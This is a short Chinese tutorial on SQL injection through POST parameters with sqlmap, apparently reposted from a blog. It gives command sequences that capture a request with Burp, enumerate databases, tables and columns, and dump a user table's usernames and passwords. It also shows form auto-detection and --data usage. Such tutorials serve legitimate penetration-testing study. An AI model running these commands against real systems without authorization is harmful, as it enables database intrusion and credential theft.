注入方式一:
1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下
2.列数据库:
sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs
注:-r表示加载一个文件,-p指定参数
3.猜表
选择一个数据库,比如选fendo
sqlmap.py -r "c:\Users\fendo\Desktop\test.txt" -p n -D fendo --tables
得到user表。
4.猜列
sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n -D fendo -T user --columns
5.猜数据
sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n -D fendo -T user -C “username,password” --dump
注入方式二:自动搜索表单的方式
sqlmap.py -u "http://192.168.160.1/sqltest/post.php" --forms
注入方式三:指定一个参数的方法
sqlmap -u http://xxx.xxx.com/Login.asp --data "n=1&p=1"
原文:https://www.cnblogs.com/wdh-123/p/14213920.html